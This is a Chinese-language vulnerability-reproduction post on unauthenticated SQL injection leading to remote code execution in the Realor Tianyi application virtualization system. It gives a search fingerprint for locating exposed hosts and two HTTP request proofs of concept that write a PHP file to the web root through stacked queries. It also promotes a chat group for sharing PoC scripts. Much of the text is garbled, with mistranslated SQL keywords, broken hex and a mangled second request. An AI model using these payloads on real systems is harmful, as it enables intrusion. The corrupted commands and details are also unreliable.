【漏洞复现】瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞

【漏洞复现】瑞友天翼应用虚拟化系统SQL注入致远程代码执行漏洞0x01 产品简介
瑞友天翼应用虚拟化系统是西安瑞友信息技术资讯有限公司研发的具有自主知识产权,基于服务器计算架构的应用虚拟化平台。它将用户各种应用软件集中部署在

0x01 产品简介

瑞游天翼应用虚拟化系统是西安瑞游信息科技信息有限公司研发的基于服务器计算架构的具有自主知识产权的应用虚拟化平台。将各种用户应用软件集中部署在瑞游天翼服务器(群)上,客户可以通过WEB快速、安全地访问服务器上认可的应用软件,提供集中应用、远程访问、联合办公等功能。为用户提供安全、高效的虚拟化支撑平台。

0x02 漏洞概述

瑞游天翼应用虚拟化系统的\\Home\\Controller\\AdminController有appsave/appdel两个接口,不需要认证,攻击者可以利用php PDO默认支持堆叠,并利用堆叠写入恶意文件。到RCE。

0x03 搜索语法

app=\’REALOR-天翼应用虚拟化系统\’

0x04 漏洞复现

POC1

GET /index.php?s=/Admin/appsaveappid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b2075 6 c6 96e6b282466696c65293b%27%29+进入+输出文件+%27.%5C%5C.%5C%5C。 %5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1

Host:你的IP

POC2

/hmrao.phphp?s=/admin/appsAVEAPPID=1%27%29%3BSELECT%200X3C3F706806806666666666666666666666666666666666666666666666666666666666666 获取666666666 666666666666E -20OUTFILLLE+%27C%5C -5C -5C -5C -5C% .%5c%5cwebroot%5c% 5cqwe%。 27%23 HTTP/1.1

Host:你的IP

0x05 工具批量

nuclei

afrog

xray

POC脚本获取

使用VX扫描并加入我们内部的POC脚本共享圈。

#【漏洞复现】以上瑞游天翼应用虚拟化系统SQL注入远程代码执行漏洞相关内容来源于互联网,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91649.html

(0)
CSDN的头像CSDN
上一篇 2024年6月22日
下一篇 2024年6月23日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用 * 标注